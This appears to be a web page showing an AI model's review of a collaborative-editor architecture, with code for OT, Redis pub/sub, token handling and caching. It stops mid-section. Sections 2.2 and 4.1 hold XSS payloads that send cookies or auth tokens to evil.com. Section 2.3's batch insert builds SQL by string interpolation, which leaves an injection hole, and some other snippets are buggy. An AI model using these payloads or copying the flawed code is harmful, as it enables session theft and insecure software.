Debug This Architecture

Claude Opus 4.6's response to the 'Debug This Architecture' challenge.

Claude Opus 4.6

February 4, 2026

Text

?
Prompt

Here's the architecture for a real-time collaborative document editor (like Google Docs): **System Overview:** - Frontend: React SPA with WebSocket connections - Backend: Node.js API servers behind a load balancer (round-robin) - Database: PostgreSQL for document storage, Redis for session cache - Real-time: Each API server maintains its own WebSocket connections to clients - Sync Strategy: Last-write-wins with timestamps from client clocks - Storage: Documents saved as full HTML snapshots every 30 seconds - Auth: JWT tokens with 24-hour expiry, stored in localStorage - CDN: CloudFront for static assets, also caches API responses for 5 minutes **Data Flow:** 1. User types → change event sent via WebSocket to their connected server 2. Server writes change to PostgreSQL 3. Server broadcasts change to all WebSocket clients connected to THAT server 4. Other servers poll PostgreSQL every 2 seconds for changes 5. Conflict resolution: if two users edit the same paragraph, last timestamp wins **Scaling Plan:** - Horizontal scaling by adding more API servers - Database read replicas for read-heavy operations - Document partitioning by organization ID Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.

Response

Claude Opus 4.6Debug This Architecture

Claude Opus 4.6

Comprehensive Architecture Review: Real-time Collaborative Document Editor

This architecture has several critical flaws that would cause data loss, inconsistency, and poor user experience at scale. I'll work through every layer systematically.

1. REAL-TIME SYNCHRONIZATION FAILURES

1.1 The Split-Brain WebSocket Problem

The Flaw: Each API server only broadcasts changes to its own WebSocket clients. Other servers discover changes by polling PostgreSQL every 2 seconds.

Timeline showing the problem:

Server A (Alice connected)          Server B (Bob connected)
─────────────────────────────────   ─────────────────────────────────
t=0.0s  Alice types "Hello"
t=0.0s  Broadcast to Server A
        clients ✓
t=0.0s  Write to PostgreSQL
                                    t=0.1s  Bob types "World"
                                    t=0.1s  Broadcast to Server B
                                            clients ✓
                                    t=0.1s  Write to PostgreSQL

        ... silence ...                     ... silence ...

t=2.0s                              t=2.0s  Poll PostgreSQL
        Poll PostgreSQL                     → discovers "Hello"
        → discovers "World"                 → broadcasts to Bob
        → broadcasts to Alice

Result: 2-SECOND LATENCY for cross-server collaboration.
        That's completely unacceptable for real-time editing.

The Solution: Dedicated pub/sub layer for inter-server communication.

┌──────────┐     WebSocket      ┌────────────┐
│  Alice    │◄──────────────────►│  Server A  │
└──────────┘                    └─────┬──────┘
                                      │ PUBLISH "doc:123"
                                      ▼
                                ┌────────────┐
                                │   Redis     │
                                │   Pub/Sub   │
                                └─────┬──────┘
                                      │ SUBSCRIBE "doc:123"
                                      ▼
┌──────────┐     WebSocket      ┌────────────┐
│   Bob     │◄──────────────────►│  Server B  │
└──────────┘                    └────────────┘

// Server-side: publish changes to all servers via Redis Pub/Sub
const Redis = require('ioredis');
const pub = new Redis(REDIS_URL);
const sub = new Redis(REDIS_URL);

// When a change arrives via WebSocket from a client
async function handleClientChange(change, documentId, serverId) {
  // 1. Persist to database
  await persistChange(change);

  // 2. Broadcast to local WebSocket clients (immediate, <10ms)
  broadcastToLocalClients(documentId, change);

  // 3. Publish to Redis so OTHER servers get it immediately
  await pub.publish(`doc:${documentId}`, JSON.stringify({
    change,
    originServer: serverId,  // so we can avoid echo
    timestamp: Date.now()
  }));
}

// Every server subscribes to channels for documents with active editors
sub.on('message', (channel, message) => {
  const { change, originServer } = JSON.parse(message);

  // Don't re-broadcast changes that originated from this server
  if (originServer === MY_SERVER_ID) return;

  const documentId = channel.replace('doc:', '');
  broadcastToLocalClients(documentId, change);
});

// Subscribe when a client opens a document
function onClientOpensDocument(documentId) {
  sub.subscribe(`doc:${documentId}`);
}

Trade-offs:

Added dependency: Redis becomes a critical path component (but you already have it)
Memory: Redis Pub/Sub doesn't buffer—if a server is temporarily disconnected, it misses messages (need a catch-up mechanism from the DB)
Latency improvement: Cross-server propagation drops from ~2000ms to ~5-15ms

1.2 Last-Write-Wins Destroys User Work

The Flaw: This is the most damaging design choice in the entire architecture. With last-write-wins at the paragraph level, concurrent edits cause silent data loss.

Scenario: Alice and Bob both edit the same paragraph simultaneously.

Original paragraph: "The quick brown fox"

Alice (t=100):  "The quick brown fox jumps over the lazy dog"
                 (added " jumps over the lazy dog")

Bob   (t=101):  "The slow brown fox"
                 (changed "quick" to "slow")

Last-write-wins result: "The slow brown fox"

Alice's addition is SILENTLY DELETED. No warning. No merge. Just gone.

The Solution: Operational Transformation (OT) or CRDTs.

For a Google Docs-style editor, OT is the proven approach. Here's the conceptual implementation:

// Each change is expressed as an operation, not a state snapshot
// Operations are: retain(n), insert(text), delete(n)

// Alice's operation on "The quick brown fox" (length 19):
const aliceOp = [
  retain(19),                          // keep everything
  insert(" jumps over the lazy dog")   // append
];

// Bob's operation on "The quick brown fox" (length 19):
const bobOp = [
  retain(4),           // keep "The "
  delete(5),           // remove "quick"
  insert("slow"),      // insert "slow"
  retain(10)           // keep " brown fox"
];

// The OT transform function computes compatible operations
const [alicePrime, bobPrime] = transform(aliceOp, bobOp);

// Applying both transformed operations yields:
// "The slow brown fox jumps over the lazy dog"
// BOTH edits are preserved!

// Server-side OT engine
class DocumentOTEngine {
  constructor(documentId) {
    this.documentId = documentId;
    this.revision = 0;         // monotonically increasing server revision
    this.operationLog = [];    // ordered list of all operations
  }

  /**
   * Client sends: { revision: clientRev, operation: op }
   * clientRev = the server revision the client's op was based on
   */
  async receiveOperation(clientRevision, operation, userId) {
    // Transform against all operations that happened since
    // the client's known revision
    let transformedOp = operation;

    for (let i = clientRevision; i < this.revision; i++) {
      const serverOp = this.operationLog[i];
      // Transform client op against each concurrent server op
      [transformedOp] = transform(transformedOp, serverOp);
    }

    // Apply the transformed operation to the server document
    this.document = apply(this.document, transformedOp);
    this.operationLog.push(transformedOp);
    this.revision++;

    // Persist and broadcast
    await this.persist(transformedOp);
    this.broadcast(transformedOp, userId);

    // Send acknowledgment to the original client
    return { revision: this.revision };
  }
}

Trade-offs:

Complexity: OT is notoriously hard to implement correctly (consider using a library like ot.js or ShareDB)
Server becomes a bottleneck: Operations for a single document must be serialized through one OT engine (see Section 3.1)
Alternative—CRDTs: Libraries like Yjs or Automerge allow peer-to-peer conflict resolution without a central server, but produce larger payloads and can have surprising merge semantics

1.3 Client Clock Timestamps Are Unreliable

The Flaw: Conflict resolution relies on client-side timestamps. Client clocks are arbitrary.

Alice's laptop clock: 2024-01-15 14:00:00 (correct)
Bob's laptop clock:   2024-01-15 09:00:00 (5 hours behind)

Bob's edits will ALWAYS lose to Alice's, even if Bob edited later.
Worse: a malicious user could set their clock to year 2030
and their edits would always win.

The Solution: Use server-assigned logical ordering.

// Every operation gets a server-side revision number
// This is the OT approach from 1.2, but even without OT:

class DocumentRevisionManager {
  // Use a PostgreSQL sequence or Redis INCR for atomic ordering
  async assignRevision(documentId, operation) {
    // INCR is atomic in Redis — no two operations get the same number
    const revision = await redis.incr(`doc:${documentId}:revision`);

    return {
      ...operation,
      revision,                        // server-assigned order
      serverTimestamp: Date.now(),     // server clock, not client
      // client timestamp kept only for analytics, never for ordering
      clientTimestamp: operation.clientTimestamp
    };
  }
}

Trade-offs:

Server-assigned ordering means the server is the single source of truth for operation order
Adds a few milliseconds of latency vs. pure client-side resolution
This is a necessary trade-off—there is no correct system that relies on unsynchronized client clocks

2. DATA STORAGE AND PERSISTENCE FAILURES

2.1 30-Second Snapshot Interval = 30 Seconds of Data Loss

The Flaw: Documents are saved as full HTML snapshots every 30 seconds. If a server crashes, up to 30 seconds of all active users' work is lost.

t=0s    Snapshot saved
t=5s    Alice types a paragraph
t=15s   Bob adds a table
t=25s   Carol writes three paragraphs
t=29s   SERVER CRASHES
        ─────────────────
        All work from t=0s to t=29s is GONE.
        Three users just lost their work simultaneously.

The Solution: Event-sourced operation log with periodic snapshots for fast loading.

// Every individual operation is persisted immediately
// Snapshots are just an optimization for fast document loading

// PostgreSQL schema
const schema = `
  -- The operation log is the source of truth
  CREATE TABLE document_operations (
    id            BIGSERIAL PRIMARY KEY,
    document_id   UUID NOT NULL,
    revision      INTEGER NOT NULL,
    operation     JSONB NOT NULL,          -- the OT operation
    user_id       UUID NOT NULL,
    created_at    TIMESTAMPTZ DEFAULT NOW(),
    UNIQUE(document_id, revision)          -- enforces operation ordering
  );

  -- Snapshots are a materialized optimization, not the source of truth
  CREATE TABLE document_snapshots (
    document_id   UUID NOT NULL,
    revision      INTEGER NOT NULL,        -- snapshot is valid AT this revision
    content       JSONB NOT NULL,          -- full document state
    created_at    TIMESTAMPTZ DEFAULT NOW(),
    PRIMARY KEY(document_id, revision)
  );

  -- Index for fast "give me ops since revision X" queries
  CREATE INDEX idx_ops_doc_revision
    ON document_operations(document_id, revision);
`;

// Loading a document: snapshot + replay
async function loadDocument(documentId) {
  // 1. Get the latest snapshot
  const snapshot = await db.query(`
    SELECT content, revision FROM document_snapshots
    WHERE document_id = $1
    ORDER BY revision DESC LIMIT 1
  `, [documentId]);

  // 2. Get all operations AFTER the snapshot
  const ops = await db.query(`
    SELECT operation FROM document_operations
    WHERE document_id = $1 AND revision > $2
    ORDER BY revision ASC
  `, [documentId, snapshot.revision]);

  // 3. Replay operations on top of snapshot
  let document = snapshot.content;
  for (const op of ops) {
    document = applyOperation(document, op.operation);
  }

  return { document, revision: snapshot.revision + ops.length };
}

// Background job: create snapshots periodically to bound replay cost
async function createSnapshot(documentId) {
  const { document, revision } = await loadDocument(documentId);
  await db.query(`
    INSERT INTO document_snapshots (document_id, revision, content)
    VALUES ($1, $2, $3)
    ON CONFLICT DO NOTHING
  `, [documentId, revision, document]);
}

Trade-offs:

More writes: Every keystroke (or batched group of keystrokes) hits the database instead of one write every 30 seconds
Mitigation: Batch operations client-side (e.g., send every 100ms or on pause), and use PostgreSQL's efficient append-only inserts
Storage growth: Operation logs grow indefinitely—need a compaction strategy (snapshot + truncate old ops)
Benefit: Zero data loss on server crash, plus you get full edit history/undo for free

2.2 Full HTML Snapshots Are Fragile and Bloated

The Flaw: Storing documents as "full HTML snapshots" creates multiple problems:

Problems with raw HTML storage:

1. XSS VULNERABILITY:
   User pastes: <img src=x onerror="fetch('evil.com/steal?cookie='+document.cookie)">
   If stored as raw HTML and rendered, every viewer gets compromised.

2. BLOAT:
   A 1-page document in HTML: ~50KB
   Same content in structured JSON: ~5KB
   With 30-second snapshots × millions of documents = massive storage

3. NO STRUCTURED OPERATIONS:
   You can't diff two HTML snapshots to figure out what changed.
   You can't do OT on raw HTML.
   You can't build features like "show me what Bob changed."

The Solution: Use a structured document model (like ProseMirror/Tiptap's JSON schema).

// Instead of: "<h1>Title</h1><p>Hello <strong>world</strong></p>"
// Store:
const documentStructure = {
  type: "doc",
  content: [
    {
      type: "heading",
      attrs: { level: 1 },
      content: [{ type: "text", text: "Title" }]
    },
    {
      type: "paragraph",
      content: [
        { type: "text", text: "Hello " },
        { type: "text", text: "world", marks: [{ type: "bold" }] }
      ]
    }
  ]
};

// This structured format:
// ✓ Can be validated against a schema (no XSS)
// ✓ Can be diffed structurally
// ✓ Can have OT operations applied to it
// ✓ Is ~60-80% smaller than equivalent HTML
// ✓ Can be rendered to HTML, Markdown, PDF, etc.

// Sanitization on output (defense in depth)
function renderToHTML(doc) {
  // Even with structured storage, sanitize on render
  return sanitizeHtml(structuredToHtml(doc), {
    allowedTags: ['h1','h2','h3','p','strong','em','a','ul','ol','li','table'],
    allowedAttributes: { 'a': ['href'] }
  });
}

2.3 PostgreSQL Write Bottleneck Under Real-Time Load

The Flaw: Every keystroke from every user results in a write to PostgreSQL. PostgreSQL is excellent, but it's not designed for the write pattern of "millions of tiny inserts per second with immediate consistency requirements."

Back-of-napkin math:
- 100,000 concurrent users
- Average 3 operations/second per user (typing)
- = 300,000 writes/second to PostgreSQL
- Each write needs to be durable (fsync) for data safety
- PostgreSQL on good hardware: ~50,000-100,000 TPS

You're 3-6x over capacity.

The Solution: Multi-tier write strategy.

// Tier 1: Redis Streams for immediate durability + ordering (microseconds)
// Tier 2: Async drain from Redis to PostgreSQL (batched, milliseconds)

const Redis = require('ioredis');
const redis = new Redis(REDIS_URL);

// When an operation arrives, write to Redis Stream (very fast, persistent)
async function persistOperation(documentId, operation) {
  // XADD is O(1) and Redis Streams are persistent (AOF)
  const streamId = await redis.xadd(
    `ops:${documentId}`,
    '*',  // auto-generate ID
    'op', JSON.stringify(operation)
  );

  // Also publish for real-time broadcast (from section 1.1)
  await redis.publish(`doc:${documentId}`, JSON.stringify(operation));

  return streamId;
}

// Background worker: drain Redis Streams to PostgreSQL in batches
async function drainToPostgres() {
  while (true) {
    // Read up to 100 operations from each active document stream
    const streams = await redis.xreadgroup(
      'GROUP', 'pg-writer', 'worker-1',
      'COUNT', 100,
      'BLOCK', 1000,  // wait up to 1s for new data
      'STREAMS', ...activeDocumentStreams, ...ids
    );

    if (streams) {
      // Batch insert into PostgreSQL (much more efficient)
      const values = streams.flatMap(([stream, entries]) =>
        entries.map(([id, fields]) => {
          const op = JSON.parse(fields[1]);
          return `('${op.documentId}', ${op.revision}, '${JSON.stringify(op)}'::jsonb)`;
        })
      );

      await db.query(`
        INSERT INTO document_operations (document_id, revision, operation)
        VALUES ${values.join(',')}
      `);

      // Acknowledge processed entries
      for (const [stream, entries] of streams) {
        await redis.xack(stream, 'pg-writer', ...entries.map(e => e[0]));
      }
    }
  }
}

Trade-offs:

Added complexity: Two storage systems to manage
Failure mode: If Redis dies before draining to PostgreSQL, you lose those operations (mitigate with Redis AOF persistence + replication)
Consistency: PostgreSQL is now slightly behind real-time (acceptable since real-time reads come from Redis/memory anyway)

3. SCALING AND CONCURRENCY FAILURES

3.1 Document-Level Concurrency Bottleneck

The Flaw: OT requires serialized processing of operations per document. If 500 users are editing the same document, all operations must be processed sequentially by one entity. With round-robin load balancing, operations for the same document scatter across all servers.

Round-robin distributes users randomly:

Server 1: Alice (doc A), Dave (doc B), Grace (doc A)
Server 2: Bob (doc A), Eve (doc C), Heidi (doc A)
Server 3: Carol (doc A), Frank (doc B), Ivan (doc A)

Document A's operations arrive at 3 different servers.
Who serializes them? Who runs the OT engine?
Every server would need to coordinate via distributed locking. Nightmare.

The Solution: Sticky routing — all connections for a document go to the same server.

# Nginx/HAProxy: route by document ID, not round-robin
upstream api_servers {
    # Consistent hashing by document ID
    hash $arg_documentId consistent;

    server api-1:3000;
    server api-2:3000;
    server api-3:3000;
}

# WebSocket upgrade with document-based routing
map $args $document_id {
    ~documentId=(?<did>[^&]+) $did;
}

server {
    location /ws {
        proxy_pass http://api_servers;
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";

        # Sticky routing: same document always goes to same server
        # Consistent hashing means adding/removing servers only
        # remaps ~1/N of documents
    }
}

// Server-side: each server is the authoritative OT engine
// for its assigned documents

class Server {
  constructor() {
    // In-memory OT engines only for documents assigned to THIS server
    this.documentEngines = new Map();
  }

  getOrCreateEngine(documentId) {
    if (!this.documentEngines.has(documentId)) {
      const engine = new DocumentOTEngine(documentId);
      // Load current state from database
      engine.initialize();
      this.documentEngines.set(documentId, engine);
    }
    return this.documentEngines.get(documentId);
  }

  async handleOperation(documentId, clientRevision, operation) {
    const engine = this.getOrCreateEngine(documentId);
    // Serialized per-document via the single engine instance
    // Node.js single-threaded event loop helps here!
    return engine.receiveOperation(clientRevision, operation);
  }
}

Trade-offs:

Hot documents: A viral document with 10,000 concurrent editors overwhelms one server (need document sharding at that scale—split into sections)
Server failure: When a server dies, its documents must be reassigned (consistent hashing makes this automatic, but clients need to reconnect)
Uneven load: Some servers may handle more active documents than others (monitor and rebalance)

3.2 Read Replica Lag Causes Stale Reads

The Flaw: PostgreSQL read replicas have replication lag (typically 10ms-1s, but can spike to minutes under load). If a user writes to the primary and then reads from a replica, they may not see their own changes.

t=0ms   User saves document title → write goes to PRIMARY
t=5ms   User's browser requests document list → read goes to REPLICA
        Replica hasn't received the write yet
        User doesn't see their new title → "Where did my change go?!"

The Solution: Read-your-own-writes consistency.

// Track the last write position per user session
class ConsistentReader {
  // After any write, store the PostgreSQL WAL position
  async afterWrite(userId) {
    const result = await primaryDb.query(
      'SELECT pg_current_wal_lsn() as lsn'
    );
    await redis.set(
      `user:${userId}:last_write_lsn`,
      result.rows[0].lsn,
      'EX', 30  // expire after 30 seconds
    );
  }

  // Before any read, check if the replica has caught up
  async getReadConnection(userId) {
    const lastWriteLsn = await redis.get(`user:${userId}:last_write_lsn`);

    if (!lastWriteLsn) {
      // No recent writes — replica is fine
      return replicaDb;
    }

    // Check if replica has caught up to the user's last write
    const result = await replicaDb.query(
      'SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn as caught_up',
      [lastWriteLsn]
    );

    if (result.rows[0].caught_up) {
      return replicaDb;
    }

    // Replica hasn't caught up — read from primary
    return primaryDb;
  }
}

Trade-offs:

More primary reads: Some reads that could go to replicas will hit the primary
Complexity: Need to track write positions per user
Alternative: For the real-time editing path, bypass replicas entirely (all real-time state comes from Redis/memory); use replicas only for non-real-time queries (analytics, search, document listing)

3.3 Organization-Based Partitioning Creates Hot Spots

The Flaw: Partitioning by organization ID means one large organization's data all lives on one partition. If Google (500,000 employees) uses your tool, that partition is 1000x larger than a 50-person startup's partition.

Partition 1: ["TinyStartup LLC"]     → 200 documents
Partition 2: ["MegaCorp Inc."]       → 5,000,000 documents
Partition 3: ["SmallAgency Co."]     → 500 documents

Partition 2 is a massive hot spot.

The Solution: Hash-based partitioning on document ID, with organization as a secondary index.

-- Partition by hash of document_id (even distribution guaranteed)
CREATE TABLE document_operations (
    id            BIGSERIAL,
    document_id   UUID NOT NULL,
    org_id        UUID NOT NULL,
    revision      INTEGER NOT NULL,
    operation     JSONB NOT NULL,
    created_at    TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (document_id);

-- Create partitions (e.g., 16 partitions)
CREATE TABLE document_operations_p0
    PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 0);
CREATE TABLE document_operations_p1
    PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 1);
-- ... through p15

-- Organization-level queries use an index, not the partition key
CREATE INDEX idx_ops_org ON document_operations (org_id, created_at);

Trade-offs:

Cross-org queries are fine: Hash partitioning distributes evenly
Org-level queries are slightly slower: Must scan all partitions (but the index helps)
Rebalancing: Adding partitions requires data redistribution (plan partition count for 5-year growth)

4. SECURITY VULNERABILITIES

4.1 JWT in localStorage = XSS Token Theft

The Flaw: JWTs stored in localStorage are accessible to any JavaScript running on the page. A single XSS vulnerability (including from third-party scripts) exposes every user's session.

// Any XSS payload can steal the token:
fetch('https://evil.com/steal', {
  method: 'POST',
  body: JSON.stringify({
    token: localStorage.getItem('auth_token'),
    // Attacker now has a 24-hour valid session
    // They can read/modify ALL of the user's documents
  })
});

The Solution: HttpOnly cookies with proper security attributes.

// Server: set JWT as HttpOnly cookie (JavaScript cannot access it)
function setAuthCookie(res, token) {
  res.cookie('session', token, {
    httpOnly: true,     // JavaScript cannot read this cookie
    secure: true,       // only sent over HTTPS
    sameSite: 'strict', // not sent on cross-origin requests (CSRF protection)
    maxAge: 24 * 60 * 60 * 1000,  // 24 hours
    path: '/',
    domain: '.yourdomain.com'
  });
}

// For WebSocket auth (cookies are sent on WS handshake):
const WebSocket = require('ws');
const wss = new WebSocket.Server({ noServer: true });

server.on('upgrade', (request, socket, head) => {
  // Parse cookie from the upgrade request headers
  const cookies = parseCookies(request.headers.cookie);
  const token = cookies.session;

  try {
    const user = jwt.verify(token, JWT_SECRET);
    wss.handleUpgrade(request, socket, head, (ws) => {
      ws.user = user;
      wss.emit('connection', ws, request);
    });
  } catch (err) {
    socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
    socket.destroy();
  }
});

Trade-offs:

CSRF risk: Cookies are sent automatically, so you need CSRF protection (SameSite=Strict handles most cases; add CSRF tokens for older browsers)
Cross-domain complexity: If your API is on a different domain than your frontend, you need CORS configuration
Mobile/native clients: May need a separate token-based auth flow (but web clients should use cookies)

4.2 24-Hour JWT with No Revocation

The Flaw: If a user's token is compromised, or they're fired/deactivated, the token remains valid for up to 24 hours. JWTs are stateless — there's no server-side way to invalidate them without additional infrastructure.

t=0h    Employee gets JWT (expires t=24h)
t=1h    Employee is terminated, account deactivated
t=1h-24h  Terminated employee still has full access
          Can download/modify/delete all documents they had access to

The Solution: Short-lived access tokens + refresh token rotation + server-side deny list.

// Token strategy:
// - Access token: 15-minute expiry (short-lived, used for API calls)
// - Refresh token: 7-day expiry (stored in HttpOnly cookie, used to get new access tokens)

function issueTokens(user) {
  const accessToken = jwt.sign(
    { userId: user.id, role: user.role },
    ACCESS_SECRET,
    { expiresIn: '15m' }
  );

  const refreshToken = jwt.sign(
    { userId: user.id, tokenFamily: uuid() },
    REFRESH_SECRET,
    { expiresIn: '7d' }
  );

  // Store refresh token hash in database for revocation
  await db.query(`
    INSERT INTO refresh_tokens (user_id, token_hash, family, expires_at)
    VALUES ($1, $2, $3, NOW() + INTERVAL '7 days')
  `, [user.id, hash(refreshToken), refreshToken.tokenFamily]);

  return { accessToken, refreshToken };
}

// Fast revocation check using Redis (checked on every request)
async function isTokenRevoked(jti) {
  return await redis.sismember('revoked_tokens', jti);
}

// When user is deactivated: revoke all their tokens
async function deactivateUser(userId) {
  // Add all active token IDs to the deny list
  await redis.sadd('revoked_tokens', ...activeTokenIds);
  // Delete all refresh tokens
  await db.query('DELETE FROM refresh_tokens WHERE user_id = $1', [userId]);
}

Trade-offs:

Added latency: Every request checks the deny list (Redis SISMEMBER is O(1), adds ~1ms)
Complexity: Refresh token rotation logic is non-trivial
Hybrid approach: You're adding server-side state to a "stateless" JWT system (but pure stateless JWTs are inappropriate for applications that need revocation)

4.3 No Document-Level Authorization on WebSocket Messages

The Flaw: The architecture describes authentication (JWT) but not authorization. Once authenticated, can any user open a WebSocket to any document? Every incoming operation must be checked.

// VULNERABLE: no authorization check
ws.on('message', async (data) => {
  const { documentId, operation } = JSON.parse(data);
  // Anyone can send operations to any document!
  await handleOperation(documentId, operation);
});

The Solution: Per-document permission checks on every operation.

// Permission model
const PERMISSIONS = {
  OWNER: ['read', 'write', 'share', 'delete'],
  EDITOR: ['read', 'write'],
  COMMENTER: ['read', 'comment'],
  VIEWER: ['read']
};

// Check on WebSocket connection AND on every message
ws.on('message', async (data) => {
  const { documentId, operation } = JSON.parse(data);

  // Check permission (cached in Redis for performance)
  const permission = await getPermission(ws.user.id, documentId);

  if (!permission || !PERMISSIONS[permission].includes('write')) {
    ws.send(JSON.stringify({
      error: 'FORBIDDEN',
      message: 'You do not have write access to this document'
    }));
    return;
  }

  await handleOperation(documentId, operation, ws.user);
});

// Cache permissions in Redis (invalidate on share/unshare)
async function getPermission(userId, documentId) {
  const cacheKey = `perm:${userId}:${documentId}`;
  let permission = await redis.get(cacheKey);

  if (!permission) {
    const result = await db.query(`
      SELECT role FROM document_permissions
      WHERE user_id = $1 AND document_id = $2
    `, [userId, documentId]);

    permission = result.rows[0]?.role || 'NONE';
    await redis.set(cacheKey, permission, 'EX', 300); // cache 5 min
  }

  return permission === 'NONE' ? null : permission;
}

5. CDN AND CACHING FAILURES

5.1 CDN Caching API Responses = Serving Stale/Wrong Data

The Flaw: CloudFront caching API responses for 5 minutes is extremely dangerous for a collaborative editor. Users will see stale document lists, stale permissions, and stale content.

Scenario:
t=0:00  Alice shares document with Bob → API returns "shared" status
        CloudFront caches this response

t=0:30  Alice REVOKES Bob's access → API returns "not shared"
        But CloudFront still has the old cached response

t=0:30-5:00  Bob's browser still gets the cached "shared" response
             Bob can still see and potentially access the document
             for up to 5 more minutes after access was revoked

The Solution: Separate caching strategies by content type.

// CDN configuration: NEVER cache authenticated API responses
// Only cache static assets and truly public content

// CloudFront behavior configurations:
const cloudFrontBehaviors = {
  // Static assets: aggressive caching
  '/static/*': {
    cachePolicyId: 'CachingOptimized',  // cache forever, bust with filename hash
    ttl: { default: 86400, max: 31536000 },
    compress: true
  },

  // Public marketing pages: moderate caching
  '/public/*': {
    cachePolicyId: 'CachingOptimized',
    ttl: { default: 300 },  // 5 min is fine for public content
  },

  // API endpoints: NO CDN CACHING
  '/api/*': {
    cachePolicyId: 'CachingDisabled',
    originRequestPolicyId: 'AllViewer',  // forward all headers
    // Let the application server set its own Cache-Control headers
  },

  // WebSocket: pass through entirely
  '/ws': {
    cachePolicyId: 'CachingDisabled',
    originRequestPolicyId: 'AllViewer',
  }
};

// Application-level caching headers (set by the API server)
app.get('/api/documents', (req, res) => {
  res.set({
    'Cache-Control': 'private, no-store',  // never cache user-specific data
    'Vary': 'Authorization, Cookie'
  });
  // ... return documents
});

app.get('/api/documents/:id/content', (req, res) => {
  // Document content changes constantly in a collaborative editor
  res.set('Cache-Control', 'no-store');
  // ... return content
});

Trade-offs:

Higher origin load: API requests always hit your servers (this is correct—authenticated, mutable data should not be CDN-cached)
Mitigation: Use application-level caching (Redis) instead of CDN caching for API responses
Static assets still benefit: JS bundles, CSS, images, fonts are still CDN-cached

6. CONNECTION MANAGEMENT FAILURES

6.1 No WebSocket Reconnection or Offline Handling

The Flaw: The architecture doesn't address what happens when a WebSocket connection drops (network switch, laptop sleep, mobile network change). Without explicit handling, users will type into a disconnected editor and lose everything.

The Solution: Client-side operation buffering with automatic reconnection.

class ResilientDocumentConnection {
  constructor(documentId) {
    this.documentId = documentId;
    this.pendingOps = [];          // operations not yet acknowledged by server
    this.bufferedOps = [];         // operations created while disconnected
    this.serverRevision = 0;
    this.state = 'disconnected';   // disconnected | connecting | synchronized
    this.reconnectAttempt = 0;
  }

  connect() {
    this.state = 'connecting';
    this.ws = new WebSocket(
      `wss://api.example.com/ws?documentId=${this.documentId}`
    );

    this.ws.onopen = () => {
      this.state = 'synchronized';
      this.reconnectAttempt = 0;

      // Send any operations that were buffered while offline
      for (const op of this.bufferedOps) {
        this.sendOperation(op);
      }
      this.bufferedOps = [];
    };

    this.ws.onclose = (event) => {
      this.state = 'disconnected';
      this.scheduleReconnect();
    };

    this.ws.onerror = () => {
      // onclose will fire after onerror
    };

    this.ws.onmessage = (event) => {
      this.handleServerMessage(JSON.parse(event.data));
    };
  }

  // User makes an edit
  applyLocalOperation(operation) {
    // Always apply locally immediately (optimistic)
    this.editor.apply(operation);

    if (this.state === 'synchronized') {
      this.sendOperation(operation);
    } else {
      // Buffer for later — user can keep typing offline
      this.bufferedOps.push(operation);
      this.showOfflineIndicator();
    }
  }

  scheduleReconnect() {
    // Exponential backoff with jitter
    const baseDelay = Math.min(1000 * Math.pow(2, this.reconnectAttempt), 30000);
    const jitter = baseDelay * 0.5 * Math.random();
    const delay = baseDelay + jitter;

    this.reconnectAttempt++;

    console.log(`Reconnecting in ${Math.round(delay)}ms (attempt ${this.reconnectAttempt})`);
    setTimeout(() => this.connect(), delay);
  }

  showOfflineIndicator() {
    // Show yellow "offline — changes will sync when reconnected" banner
    // Users MUST know their changes aren't saved yet
    document.getElementById('sync-status').className = 'offline';
  }
}

Trade-offs:

Conflict resolution on reconnect: Buffered operations may conflict with changes made by others while offline (OT handles this, but the longer the offline period, the more complex the transform)
Memory: Very long offline sessions could buffer many operations (set a reasonable limit and warn the user)
UX: Must clearly communicate connection state to users

6.2 WebSocket Memory Leaks on Server

The Flaw: Long-lived WebSocket connections accumulate state. Without proper cleanup, servers leak memory from abandoned connections, dead subscriptions, and orphaned OT engine instances.

// Common leak patterns:

// LEAK 1: Client closes browser without clean disconnect
// The TCP connection may stay "open" on the server for minutes

// LEAK 2: OT engines for documents that no one is editing anymore
// stay in memory indefinitely

// LEAK 3: Redis pub/sub subscriptions for documents never unsubscribed

The Solution: Heartbeat monitoring + resource lifecycle management.

class ConnectionManager {
  constructor() {
    this.connections = new Map();  // ws → metadata
    this.documentSubscribers = new Map();  // documentId → Set<ws>
  }

  addConnection(ws, user, documentId) {
    ws.isAlive = true;
    ws.documentId = documentId;

    this.connections.set(ws, {
      user,
      documentId,
      connectedAt: Date.now(),
      lastActivity: Date.now()
    });

    // Track subscribers per document
    if (!this.documentSubscribers.has(documentId)) {
      this.documentSubscribers.set(documentId, new Set());
      redis.subscribe(`doc:${documentId}`);  // subscribe on first user
    }
    this.documentSubscribers.get(documentId).add(ws);

    // Heartbeat: client must respond to pings
    ws.on('pong', () => { ws.isAlive = true; });
    ws.on('close', () => this.removeConnection(ws));
    ws.on('error', () => this.removeConnection(ws));
  }

  removeConnection(ws) {
    const meta = this.connections.get(ws);
    if (!meta) return;

    this.connections.delete(ws);

    // Remove from document subscribers
    const subs = this.documentSubscribers.get(meta.documentId);
    if (subs) {
      subs.delete(ws);

      // If no more subscribers for this document, clean up
      if (subs.size === 0) {
        this.documentSubscribers.delete(meta.documentId);
        redis.unsubscribe(`doc:${meta.documentId}`);

        // Unload OT engine after a grace period
        // (in case someone reconnects quickly)
        setTimeout(() => {
          if (!this.documentSubscribers.has(meta.documentId)) {
            documentEngines.delete(meta.documentId);
            console.log(`Unloaded OT engine for doc ${meta.documentId}`);
          }
        }, 60000);  // 60-second grace period
      }
    }

    try { ws.terminate(); } catch (e) {}
  }

  // Run every 30 seconds: detect dead connections
  startHeartbeat() {
    setInterval(() => {
      for (const [ws, meta] of this.connections) {
        if (!ws.isAlive) {
          console.log(`Dead connection detected: user ${meta.user.id}`);
          this.removeConnection(ws);
          return;
        }
        ws.isAlive = false;
        ws.ping();  // client must respond with pong within 30s
      }
    }, 30000);
  }
}

7. LOAD BALANCER FAILURE MODE

7.1 Round-Robin + WebSockets = Unbalanced Load

The Flaw: Round-robin assigns connections evenly at connection time, but WebSocket connections are long-lived. Over time, as servers are added/removed or connections have different lifetimes, load becomes severely unbalanced.

Scenario: Start with 2 servers, each gets 5000 connections.
Add server 3 for scaling.

Server 1: 5000 connections (existing, long-lived)
Server 2: 5000 connections (existing, long-lived)
